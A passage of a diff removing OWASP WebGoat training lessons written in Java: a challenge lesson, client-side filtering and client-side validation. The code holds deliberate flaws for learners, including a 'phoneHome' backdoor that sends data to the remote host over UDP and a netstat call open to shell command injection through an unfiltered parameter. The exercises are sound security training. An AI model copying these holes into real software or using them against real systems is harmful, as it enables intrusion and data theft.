-                s.getRequest().getContextPath() + "/" + WEBGOAT_CHALLENGE + "_"
-                                                                                    + s.getUserName() + JSP));
-        ec.addElement(new HR());
-
-        return ec;
-    }
-
-    private void resetWebPage(WebSession s)
-    {
-        try
-        {
-            // get current text and compare to the new text
-            String defacedpath = s.getContext().getRealPath(WEBGOAT_CHALLENGE + "_" + s.getUserName() + JSP);
-            String masterFilePath = s.getContext().getRealPath(WEBGOAT_CHALLENGE_JSP);
-
-            // replace the defaced text with the original
-            File usersFile = new File(defacedpath);
-            FileWriter fw = new FileWriter(usersFile);
-            fw.write(getFileText(new BufferedReader(new FileReader(masterFilePath)), false));
-            fw.close();
-            // System.out.println("webgoat_guest replaced: " + getFileText( new
-            // BufferedReader( new FileReader( defacedpath ) ), false ) );
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        }
-    }
-
-    protected Category getDefaultCategory()
-    {
-        return Category.CHALLENGE;
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     * @exception Exception
-     *                Description of the Exception
-     */
-    protected Element doStage4(WebSession s) throws Exception
-    {
-        makeSuccess(s);
-        ElementContainer ec = new ElementContainer();
-        ec.addElement(new H1().addElement("Thanks for coming!"));
-        ec.addElement(new BR());
-        ec.addElement(new H1()
-                .addElement("Please remember that you will be caught and fired if you use these techniques for evil."));
-
-        return (ec);
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     * @exception Exception
-     *                Description of the Exception
-     */
-    protected Element doStage5(WebSession s) throws Exception
-    {
-        // <START_OMIT_SOURCE>
-        ElementContainer ec = new ElementContainer();
-        return (ec);
-        // <END_OMIT_SOURCE>
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     * @exception Exception
-     *                Description of the Exception
-     */
-    protected Element doStage6(WebSession s) throws Exception
-    {
-        return (new StringElement("not yet"));
-    }
-
-    /**
-     * Gets the hints attribute of the ChallengeScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        // <START_OMIT_SOURCE>
-
-        List<String> hints = new ArrayList<String>();
-        hints.add("You need to gain access to the Java source code for this lesson.");
-        hints.add("Seriously, no more hints -- it's a CHALLENGE!");
-        hints.add("Come on -- give it a rest!");
-        if (getStage(s) != 1)
-        ;
-        {
-            hints.add("Persistance is always rewarded");
-        }
-
-        return hints;
-
-        // <END_OMIT_SOURCE>
-    }
-
-    protected Element makeLogin(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        ec.addElement(new H1().addElement("Sign In "));
-        Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-        if (s.isColor())
-        {
-            t.setBorder(1);
-        }
-
-        TR tr = new TR();
-        tr.addElement(new TH()
-                .addElement("Please sign in to your account.  See the OWASP admin if you do not have an account.")
-                .setColSpan(2).setAlign("left"));
-        t.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement("*Required Fields").setWidth("30%"));
-        t.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-        t.addElement(tr);
-
-        TR row1 = new TR();
-        TR row2 = new TR();
-        row1.addElement(new TD(new B(new StringElement("*User Name: "))));
-        row2.addElement(new TD(new B(new StringElement("*Password: "))));
-
-        Input input1 = new Input(Input.TEXT, USERNAME, "");
-        Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
-        row1.addElement(new TD(input1));
-        row2.addElement(new TD(input2));
-        t.addElement(row1);
-        t.addElement(row2);
-
-        Element b = ECSFactory.makeButton("Login");
-        t.addElement(new TR(new TD(b)));
-        ec.addElement(t);
-
-        return (ec);
-    }
-
-    /**
-     * Gets the instructions attribute of the ChallengeScreen object
-     * 
-     * @return The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-        String instructions = "Your mission is to break the authentication scheme, "
-                + "steal all the credit cards from the database, and then deface the website. "
-                + "You will have to use many of the techniques you have learned in the other lessons. "
-                + "The main webpage to deface for this site is 'webgoat_challenge_" + s.getUserName() + ".jsp'";
-
-        return (instructions);
-    }
-
-    /**
-     * Gets the ranking attribute of the ChallengeScreen object
-     * 
-     * @return The ranking value
-     */
-    protected Integer getDefaultRanking()
-    {
-        return new Integer(130);
-    }
-
-    /**
-     * This is a deliberate 'backdoor' that would send user name and password back to the remote
-     * host. Obviously, sending the password back to the remote host isn't that useful but... you
-     * get the idea
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @param message
-     *            Description of the Parameter
-     */
-    protected void phoneHome(WebSession s, String message)
-    {
-        try
-        {
-            InetAddress addr = InetAddress.getByName(s.getRequest().getRemoteHost());
-            DatagramPacket dp = new DatagramPacket(message.getBytes(), message.length());
-            DatagramSocket sock = new DatagramSocket();
-            sock.connect(addr, 1234);
-            sock.send(dp);
-            sock.close();
-        } catch (Exception e)
-        {
-            System.out.println("Couldn't phone home");
-            e.printStackTrace();
-        }
-    }
-
-    /**
-     * Gets the title attribute of the ChallengeScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("The CHALLENGE");
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param text
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected ElementContainer getNetstatResults(WebSession s)
-    {
-        // <START_OMIT_SOURCE>
-
-        ElementContainer ec = new ElementContainer();
-
-        Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("80%").setAlign("center");
-
-        if (s.isColor())
-        {
-            t.setBorder(1);
-        }
-
-        String[] colWidths = new String[] { "55", "110", "260", "70", "50" };
-        TR tr = new TR();
-        tr.addElement(new TH().addElement("Protocol").setWidth(colWidths[0]));
-        tr.addElement(new TH().addElement("Local Address").setWidth(colWidths[1]));
-        tr.addElement(new TH().addElement("Foreign Address").setWidth(colWidths[2]));
-        tr.addElement(new TH().addElement("State").setWidth(colWidths[3]));
-        tr.addElement(new TH().addElement("Offload State").setWidth(colWidths[4]));
-        t.addElement(tr);
-
-        String protocol = s.getParser().getRawParameter(PROTOCOL, "tcp");
-
-        String osName = System.getProperty("os.name");
-        ExecResults er = null;
-        if (osName.indexOf("Windows") != -1)
-        {
-            String cmd = "cmd.exe /c netstat -ant -p " + protocol;
-            er = Exec.execSimple(cmd);
-        }
-        else
-        {
-            String[] cmd = { "/bin/sh", "-c", "netstat -ant -p " + protocol };
-            er = Exec.execSimple(cmd);
-        }
-
-        String results = er.getOutput();
-        StringTokenizer lines = new StringTokenizer(results, "\n");
-        String line = lines.nextToken();
-        // System.out.println(line);
-        int start = 0;
-        while (start == 0 && lines.hasMoreTokens())
-        {
-            if ((line.indexOf("Proto") != -1))
-            {
-                start++;
-            }
-            else
-            {
-                line = lines.nextToken();
-            }
-        }
-        while (start > 0 && lines.hasMoreTokens())
-        {
-            // in order to avoid a ill-rendered screen when the user performs
-            // command injection, we will wrap the screen at 4 columns
-            int columnCount = 0;
-            tr = new TR();
-            TD td;
-            StringTokenizer tokens = new StringTokenizer(lines.nextToken(), "\t ");
-            while (tokens.hasMoreTokens() && columnCount < 5)
-            {
-                td = new TD().setWidth(colWidths[columnCount++]);
-                tr.addElement(td.addElement(tokens.nextToken()));
-            }
-            t.addElement(tr);
-        }
-        // parse the results
-        ec.addElement(t);
-        return (ec);
-        // <END_OMIT_SOURCE>
-
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element makeClues(WebSession s)
-    {
-        return new StringElement("Clues not Available :)");
-    }
-
-    protected Element makeHints(WebSession s)
-    {
-        return new StringElement("Hint: Find the hints");
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @param message
-     *            Description of the Parameter
-     */
-    protected void sendMessage(Socket s, String message)
-    {
-        try
-        {
-            OutputStreamWriter osw = new OutputStreamWriter(s.getOutputStream());
-            osw.write(message);
-        } catch (Exception e)
-        {
-            // System.out.println("Couldn't write " + message + " to " + s);
-            e.printStackTrace();
-        }
-    }
-
-    protected Element buildCart(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        ec.addElement(new HR().setWidth("90%"));
-        ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
-        Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
-
-        if (s.isColor())
-        {
-            t.setBorder(1);
-        }
-
-        TR tr = new TR();
-        tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%"));
-        tr.addElement(new TH().addElement("Price:").setWidth("10%"));
-        tr.addElement(new TH().addElement("Quantity:").setWidth("3%"));
-        tr.addElement(new TH().addElement("Total").setWidth("7%"));
-        t.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement("Sympathy Bouquet"));
-        tr.addElement(new TD().addElement("59.99").setAlign("right"));
-        tr.addElement(new TD().addElement(" 1 ").setAlign("right"));
-        tr.addElement(new TD().addElement("59.99"));
-        t.addElement(tr);
-
-        ec.addElement(t);
-
-        t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-        if (s.isColor())
-        {
-            t.setBorder(1);
-        }
-
-        ec.addElement(new BR());
-        tr = new TR();
-        tr.addElement(new TD().addElement("The total charged to your credit card:"));
-        tr.addElement(new TD().addElement("59.99"));
-        t.addElement(tr);
-
-        ec.addElement(t);
-
-        return (ec);
-    }
-
-    public boolean canHaveClues()
-    {
-        return false;
-    }
-
-    /**
-     * Gets the cookie attribute of the CookieScreen object
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return The cookie value
-     */
-    protected String getCookie(WebSession s)
-    {
-        Cookie[] cookies = s.getRequest().getCookies();
-
-        for (int i = 0; i < cookies.length; i++)
-        {
-            if (cookies[i].getName().equalsIgnoreCase(USER_COOKIE)) { return (cookies[i].getValue()); }
-        }
-
-        return (null);
-    }
-}

src/main/java/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java

@@ -1,452 +0,0 @@
-
-package org.owasp.webgoat.lessons.ClientSideFiltering;
-
-import java.io.BufferedReader;
-import java.io.File;
-import java.io.FileReader;
-import java.io.IOException;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.apache.ecs.html.Script;
-import org.apache.ecs.html.Select;
-import org.apache.ecs.html.Style;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.apache.ecs.jsp.jsp_include;
-import org.apache.ecs.xhtml.style;
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.SequentialLessonAdapter;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-public class ClientSideFiltering extends SequentialLessonAdapter
-{
-
-    private final static String ANSWER = "answer";
-
-    public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
-            .addElement(
-                        new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
-                                .setVspace(0));
-
-    protected Element createContent(WebSession s)
-    {
-        return super.createStagedContent(s);
-    }
-
-    protected Element createMainContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        try
-        {
-
-            ec.addElement(new Script().setSrc("lessonJS/clientSideFiltering.js"));
-
-            Input input = new Input(Input.HIDDEN, "userID", 102);
-
-            input.setID("userID");
-
-            ec.addElement(input);
-
-            style sty = new style();
-            sty.addElement("#lesson_wrapper {height: 435px;width: 500px;}"
-                    + "#lesson_header {background-image: url(lessons/Ajax/images/lesson1_header.jpg);"
-                    + "width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}"
-                    + ".lesson_workspace {background-image: url(lessons/Ajax/images/lesson1_workspace.jpg);"
-                    + "width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}");
-
-            ec.addElement(sty);
-
-            Div wrapperDiv = new Div();
-            wrapperDiv.setID("lesson_wrapper");
-
-            Div headerDiv = new Div();
-            headerDiv.setID("lesson_header");
-
-            Div workspaceDiv = new Div();
-            workspaceDiv.setClass("lesson_workspace");
-
-            wrapperDiv.addElement(headerDiv);
-            wrapperDiv.addElement(workspaceDiv);
-
-            ec.addElement(wrapperDiv);
-
-            workspaceDiv.addElement(new BR());
-            workspaceDiv.addElement(new BR());
-
-            workspaceDiv.addElement(new P().addElement("     Select user:"));
-
-            workspaceDiv.addElement(createDropDown());
-
-            workspaceDiv.addElement(new P());
-
-            Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
-
-            t.setID("hiddenEmployeeRecords");
-            t.setStyle("display: none");
-
-            workspaceDiv.addElement(t);
-
-            t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
-
-            TR tr = new TR();
-            tr.addElement(new TD().addElement("UserID"));
-            tr.addElement(new TD().addElement("First Name"));
-            tr.addElement(new TD().addElement("Last Name"));
-            tr.addElement(new TD().addElement("SSN"));
-            tr.addElement(new TD().addElement("Salary"));
-            t.addElement(tr);
-            tr = new TR();
-            tr.setID("employeeRecord");
-            t.addElement(tr);
-
-            workspaceDiv.addElement(t);
-
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-
-        return (ec);
-    }
-
-    /**
-     * Gets the category attribute of the RoleBasedAccessControl object
-     * 
-     * @return The category value
-     */
-
-    protected ElementContainer doStage1(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        StringBuffer answerString = null;
-        int answer = 0;
-
-        try
-        {
-            answerString = new StringBuffer(s.getParser().getStringParameter(ANSWER, ""));
-            answer = Integer.parseInt(answerString.toString());
-        } catch (NumberFormatException e)
-        {
-
-            // e.printStackTrace();
-        }
-
-        if (answer == 450000)
-        {
-
-            getLessonTracker(s).setStage(2);
-            s.setMessage("Stage 1 completed.");
-
-            // Redirect user to Stage2 content.
-            ec.addElement(doStage2(s));
-        }
-        else
-        {
-            ec.addElement(stage1Content(s));
-        }
-
-        return ec;
-
-    }
-
-    protected Element doStage2(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        /**
-         * They pass iff:
-         * 
-         * 1. If the DOMXSS.js file contains the lines "escapeHTML(name)"
-         */
-        String file = s.getWebResource("lessons/Ajax/clientSideFiltering.jsp");
-        String content = getFileContent(file);
-
-        if (content.indexOf("[Managers/Manager/text()") != -1)
-        {
-            makeSuccess(s);
-            ec.addElement(stage2Content(s));
-        }
-        else
-        {
-            ec.addElement(stage2Content(s));
-        }
-
-        return ec;
-    }
-
-    protected ElementContainer stage1Content(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        try
-        {
-
-            ec.addElement(createMainContent(s));
-
-            Table t1 = new Table().setCellSpacing(0).setCellPadding(2);
-
-            if (s.isColor())
-            {
-                t1.setBorder(1);
-            }
-
-            TR tr = new TR();
-            tr.addElement(new TD().addElement("What is Neville Bartholomew's salary? "));
-            tr.addElement(new TD(new Input(Input.TEXT, ANSWER, "")));
-            Element b = ECSFactory.makeButton("Submit Answer");
-            tr.addElement(new TD(b).setAlign("LEFT"));
-            t1.addElement(tr);
-
-            ec.addElement(t1);
-
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-
-        return ec;
-    }
-
-    protected ElementContainer stage2Content(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        try
-        {
-
-            ec.addElement(createMainContent(s));
-
-            ec.addElement(new BR());
-            ec.addElement(new BR());
-
-            Table t1 = new Table().setCellSpacing(0).setCellPadding(2);
-
-            if (s.isColor())
-            {
-                t1.setBorder(1);
-            }
-
-            TR tr = new TR();
-            /*
-             * tr.addElement(new TD() .addElement("Press 'Submit' when you believe you have
-             * completed the lesson."));
-             */
-            Element b = ECSFactory.makeButton("Click here when you believe you have completed the lesson.");
-            tr.addElement(new TD(b).setAlign("CENTER"));
-            t1.addElement(tr);
-
-            ec.addElement(t1);
-
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-
-        return ec;
-    }
-
-    protected Select createDropDown()
-    {
-        Select select = new Select("UserSelect");
-
-        select.setID("UserSelect");
-
-        org.apache.ecs.html.Option option = new org.apache.ecs.html.Option("Choose Employee", "0", "Choose Employee");
-
-        select.addElement(option);
-
-        option = new org.apache.ecs.html.Option("Larry Stooge", "101", "Larry Stooge");
-
-        select.addElement(option);
-
-        option = new org.apache.ecs.html.Option("Curly Stooge", "103", "Curly Stooge");
-
-        select.addElement(option);
-
-        option = new org.apache.ecs.html.Option("Eric Walker", "104", "Eric Walker");
-
-        select.addElement(option);
-
-        option = new org.apache.ecs.html.Option("Tom Cat", "105", "Tom Cat");
-
-        select.addElement(option);
-
-        option = new org.apache.ecs.html.Option("Jerry Mouse", "106", "Jerry Mouse");
-
-        select.addElement(option);
-
-        option = new org.apache.ecs.html.Option("David Giambi", "107", "David Giambi");
-
-        select.addElement(option);
-
-        option = new org.apache.ecs.html.Option("Bruce McGuirre", "108", "Bruce McGuirre");
-
-        select.addElement(option);
-
-        option = new org.apache.ecs.html.Option("Sean Livingston", "109", "Sean Livingston");
-
-        select.addElement(option);
-
-        option = new org.apache.ecs.html.Option("Joanne McDougal", "110", "Joanne McDougal");
-
-        select.addElement(option);
-
-        select.setOnChange("selectUser()");
-
-        select.setOnFocus("fetchUserData()");
-
-        return select;
-
-    }
-
-    protected Category getDefaultCategory()
-    {
-        return Category.AJAX_SECURITY;
-    }
-
-    /**
-     * Gets the hints attribute of the RoleBasedAccessControl object
-     * 
-     * @return The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-
-        hints
-                .add("Stage 1: The information displayed when an employee is choosen from the drop down menu is stored on the client side.");
-
-        hints.add("Stage 1: Use Firebug to find where the information is stored on the client side.");
-
-        hints
-                .add("Stage 1: Examine the hidden table to see if there is anyone listed who is not in the drop down menu.");
-
-        hints.add("Stage 1: Look in the last row of the hidden table.");
-
-        hints
-                .add("Stage 1: You can access the server directly <a href = \"/webgoat/lessons/Ajax/clientSideFiltering.jsp?userId=102\">here </a>"
-                        + "to see what results are being returned");
-
-        hints.add("Stage 2: The server uses an XPath query agasinst an XML database.");
-
-        hints.add("Stage 2: The query currently returns all of the contents of the database.");
-
-        hints
-                .add("Stage 2: The query should only return the information of employees who are managed by Moe Stooge, whose userID is 102");
-
-        hints.add("Stage 2: Try using a filter operator.");
-
-        hints.add("Stage 2: Your filter operator should look something like: [Managers/Manager/text()=");
-
-        return hints;
-
-    }
-
-    public String getInstructions(WebSession s)
-    {
-        String instructions = "";
-
-        if (getLessonTracker(s).getStage() == 1)
-        {
-            instructions = "STAGE 1:\tYou are Moe Stooge, CSO of Goat Hills Financial. "
-                    + "You have access to everyone in the company's information, except the CEO, "
-                    + "Neville Bartholomew.  Or at least you shouldn't have access to the CEO's information."
-                    + "  For this exercise, "
-                    + "examine the contents of the page to see what extra information you can find.";
-        }
-        else if (getLessonTracker(s).getStage() == 2)
-        {
-            instructions = "STAGE 2:\tNow, fix the problem.  Modify the server to only return "
-                    + "results that Moe Stooge is allowed to see.";
-        }
-        return (instructions);
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(10);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the resources attribute of the RoleBasedAccessControl object
-     * 
-     * @param rl
-     *            Description of the Parameter
-     * @return The resources value
-     */
-
-    /**
-     * Gets the role attribute of the RoleBasedAccessControl object
-     * 
-     * @param user
-     *            Description of the Parameter
-     * @return The role value
-     */
-
-    /**
-     * Gets the title attribute of the AccessControlScreen object
-     * 
-     * @return The title value
-     */
-
-    public String getTitle()
-    {
-        return ("LAB: Client Side Filtering");
-    }
-
-    private String getFileContent(String content)
-    {
-        BufferedReader is = null;
-        StringBuffer sb = new StringBuffer();
-
-        try
-        {
-            is = new BufferedReader(new FileReader(new File(content)));
-            String s = null;
-
-            while ((s = is.readLine()) != null)
-            {
-                sb.append(s);
-            }
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        } finally
-        {
-            if (is != null)
-            {
-                try
-                {
-                    is.close();
-                } catch (IOException ioe)
-                {
-
-                }
-            }
-        }
-
-        return sb.toString();
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("", ASPECT_LOGO);
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/ClientSideValidation.java

@@ -1,444 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.text.DecimalFormat;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Center;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.HR;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.Script;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TH;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.util.HtmlEncoder;
-
-
-public class ClientSideValidation extends SequentialLessonAdapter
-{
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
-            .addElement(
-                        new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
-                                .setVspace(0));
-
-    private boolean stage1FirstVisit = true;
-
-    private boolean stage2FirstVisit = true;
-
-    protected Element createContent(WebSession s)
-    {
-        return super.createStagedContent(s);
-    }
-
-    protected Element doStage1(WebSession s)
-    {
-        return evalStage1(s);
-    }
-
-    protected Element doStage2(WebSession s)
-    {
-        return stage2Content(s);
-    }
-
-    protected Element evalStage1(WebSession s)
-    {
-
-        ElementContainer ec = new ElementContainer();
-
-        String param1 = s.getParser().getRawParameter("field1", "");
-
-        // test success
-
-        if (param1.equalsIgnoreCase("platinum") || param1.equalsIgnoreCase("gold") || param1.equalsIgnoreCase("silver")
-                || param1.equalsIgnoreCase("bronze") || param1.equalsIgnoreCase("pressone")
-                || param1.equalsIgnoreCase("presstwo"))
-        {
-            getLessonTracker(s).setStage(2);
-            // s.resetHintCount();
-            s.setMessage("Stage 1 completed.");
-
-            // Redirect user to Stage2 content.
-            ec.addElement(doStage2(s));
-
-        }
-        else
-        {
-            if (!stage1FirstVisit)
-            {
-                s.setMessage("Keep looking for the coupon code.");
-            }
-            stage1FirstVisit = false;
-
-            ec.addElement(stage1Content(s));
-        }
-
-        return ec;
-
-    }
-
-    protected Element stage1Content(WebSession s)
-    {
-
-        ElementContainer ec = new ElementContainer();
-
-        try
-        {
-
-            ec.addElement(new Script().setSrc("lessonJS/clientSideValidation.js"));
-
-            ec.addElement(new HR().setWidth("90%"));
-            ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart")));
-
-            ec.addElement(createQtyTable(s));
-
-            ec.addElement(createTotalTable(s));
-            ec.addElement(new BR());
-            ec.addElement(new HR().setWidth("90%"));
-
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-        return (ec);
-    }
-
-    protected Element stage2Content(WebSession s)
-    {
-
-        ElementContainer ec = new ElementContainer();
-
-        try
-        {
-
-            ec.addElement(new Script().setSrc("lessonJS/clientSideValidation.js"));
-
-            ec.addElement(new HR().setWidth("90%"));
-            ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart")));
-
-            ec.addElement(createQtyTable(s));
-
-            ec.addElement(createTotalTable(s));
-            ec.addElement(new BR());
-            ec.addElement(new HR().setWidth("90%"));
-
-            // test success
-            DecimalFormat money = new DecimalFormat("$0.00");
-
-            String grandTotalString = s.getParser().getStringParameter("GRANDTOT", "0");
-
-            float grandTotal = 1;
-
-            try
-            {
-                grandTotal = money.parse(grandTotalString).floatValue();
-            } catch (java.text.ParseException e)
-            {
-                try
-                {
-                    grandTotal = Float.parseFloat(grandTotalString);
-                } catch (java.lang.NumberFormatException e1)
-                {
-                    // eat exception, do not update grandTotal
-                }
-            }
-
-            if (getTotalQty(s) > 0 && grandTotal == 0 && !stage2FirstVisit)
-            {
-                makeSuccess(s);
-            }
-            else
-            {
-
-                if (!stage2FirstVisit)
-                {
-                    s.setMessage("Your order isn't free yet.");
-                }
-                stage2FirstVisit = false;
-            }
-
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-        return (ec);
-    }
-
-    protected ElementContainer createTotalTable(WebSession s)
-    {
-
-        ElementContainer ec = new ElementContainer();
-
-        String param1 = s.getParser().getRawParameter("field1", "");
-        String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("field2", "4128 3214 0002 1999"));
-
-        Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-        if (s.isColor())
-        {
-            t.setBorder(1);
-        }
-
-        ec.addElement(new BR());
-
-        TR tr = new TR();
-        tr.addElement(new TD().addElement("Total before coupon is applied:"));
-
-        tr.addElement(new TD().addElement(
-                                            new Input(Input.TEXT, "SUBTOT", s.getParser()
-                                                    .getStringParameter("SUBTOT", "$0.00")).setReadOnly(true)
-                                                    .setStyle("border:0px;")).setAlign("right"));
-        t.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement("Total to be charged to your credit card:"));
-
-        tr.addElement(new TD().addElement(
-                                            new Input(Input.TEXT, "GRANDTOT", s.getParser()
-                                                    .getStringParameter("GRANDTOT", "$0.00")).setReadOnly(true)
-                                                    .setStyle("border:0px;")).setAlign("right"));
-        t.addElement(tr);
-
-        t.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement(" ").setColSpan(2));
-        t.addElement(tr);
-        tr = new TR();
-        tr.addElement(new TD().addElement("Enter your credit card number:"));
-        tr.addElement(new TD().addElement(new Input(Input.TEXT, "field2", param2)));
-        t.addElement(tr);
-        tr = new TR();
-        tr.addElement(new TD().addElement("Enter your coupon code:"));
-
-        Input input = new Input(Input.TEXT, "field1", param1);
-        input.setOnKeyUp("isValidCoupon(field1.value)");
-        tr.addElement(new TD().addElement(input));
-        t.addElement(tr);
-
-        Element b = ECSFactory.makeButton("Purchase");
-        tr = new TR();
-        tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("center"));
-        t.addElement(tr);
-        ec.addElement(t);
-
-        return ec;
-
-    }
-
-    protected int getTotalQty(WebSession s)
-    {
-
-        int quantity = 0;
-
-        quantity += s.getParser().getFloatParameter("QTY1", 0.0f);
-        quantity += s.getParser().getFloatParameter("QTY2", 0.0f);
-        quantity += s.getParser().getFloatParameter("QTY3", 0.0f);
-        quantity += s.getParser().getFloatParameter("QTY4", 0.0f);
-
-        return quantity;
-    }
-
-    protected ElementContainer createQtyTable(WebSession s)
-    {
-
-        ElementContainer ec = new ElementContainer();
-        Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
-
-        if (s.isColor())
-        {
-            t.setBorder(1);
-        }
-
-        TR tr = new TR();
-        tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("70%"));
-        tr.addElement(new TH().addElement("Price").setWidth("10%"));
-        tr.addElement(new TH().addElement("Quantity").setWidth("10%"));
-        tr.addElement(new TH().addElement("Total").setWidth("10%"));
-        t.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry "));
-
-        tr.addElement(new TD().addElement(
-                                            new Input(Input.TEXT, "PRC1", s.getParser().getStringParameter("PRC1",
-                                                                                                            "$69.99"))
-                                                    .setSize(10).setReadOnly(true).setStyle("border:0px;"))
-                .setAlign("right"));
-
-        Input input = new Input(Input.TEXT, "QTY1", s.getParser().getStringParameter("QTY1", "0"));
-
-        input.setOnKeyUp("updateTotals();");
-        input.setOnLoad("updateTotals();");
-        input.setSize(10);
-
-        tr.addElement(new TD().addElement(input).setAlign("right"));
-
-        tr.addElement(new TD().addElement(
-                                            new Input(Input.TEXT, "TOT1", s.getParser().getStringParameter("TOT1",
-                                                                                                            "$0.00"))
-                                                    .setSize(10).setReadOnly(true).setStyle("border:0px;"))
-                .setAlign("right"));
-
-        t.addElement(tr);
-        tr = new TR();
-        tr.addElement(new TD().addElement("Dynex - Traditional Notebook Case"));
-
-        tr.addElement(new TD().addElement(
-                                            new Input(Input.TEXT, "PRC2", s.getParser().getStringParameter("PRC2",
-                                                                                                            "$27.99"))
-                                                    .setSize(10).setReadOnly(true).setStyle("border:0px;"))
-                .setAlign("right"));
-
-        input = new Input(Input.TEXT, "QTY2", s.getParser().getStringParameter("QTY2", "0"));
-
-        input.setOnKeyUp("updateTotals();");
-        input.setSize(10);
-        tr.addElement(new TD().addElement(input).setAlign("right"));
-
-        tr.addElement(new TD().addElement(
-                                            new Input(Input.TEXT, "TOT2", s.getParser().getStringParameter("TOT2",
-                                                                                                            "$0.00"))
